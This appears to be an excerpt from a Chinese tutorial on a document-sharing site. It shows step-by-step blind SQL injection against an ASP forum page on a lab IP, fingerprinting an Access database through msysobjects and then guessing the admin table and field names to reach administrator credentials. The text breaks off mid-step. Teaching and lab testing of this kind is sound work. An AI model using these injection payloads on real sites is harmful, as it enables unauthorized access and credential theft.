ID:18216345
大小:7.68 MB
页数:46页
时间:2018-09-15
4、滤就直接进入数据接查询了,那么我们怎么来通过这个漏洞来获取我们想要的信息呢,测试之前我们是不知道对方所使用的数据库类型也不知道数据库里面有哪些表、字段等等(类似blackboxtest),一般情况下asp可以与access和mssql数据库结合,首先我们来判断一下数据库类型在id参数后面加上andexists(select*frommsysobjects)注:mysysobjects是access的系统表完整的测试语句:http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(sele
5、ct*frommsysobjects)回车提交到服务器端如图,根据服务器返回结果,(MicrosoftJETDatabaseEngine错误'80040e09'不能读取记录;在'msysobjects'上没有读取数据权限。/bbs/gshow.asp,行11)说明存在msysobjects表,也就是说后台是采用的access数据库(若服务器返回[Microsoft][ODBCSQLServerDriver][SQLServer]对象名'msysobjects'无效。则说明是sqlserver数据库,相关方法会在下面讲述,这里重点讨论ac
6、cess数据库)下面我们来进一步获取我们想要的信息一般网站重要的信息就是后台管理员登陆帐号密码了,我们提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromusers)(判断数据库中是否存在users表)根据图中返回结果提示users表不存在,那么我们继续来提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromadmin服务器端返回的数据和http://192.168.80.
7、128:8181/bbs/gshow.asp?id=1一样这是因为参数一起带入数据库里面就变成了select*fromgonggaowhereid=1andexists(select*fromadmin)由于存在admin表条件成立就和select*fromgonggaowhereid=1的查询返回结果一样了,找到了admin表现在就以此类推猜测字段提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectuserfromadmin)服务器返回”至少一个参数没有被指定值
8、”说明不存在user字段,继续提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectadminfromadmin)服务器返回正常,说明
此文档下载收益归作者所有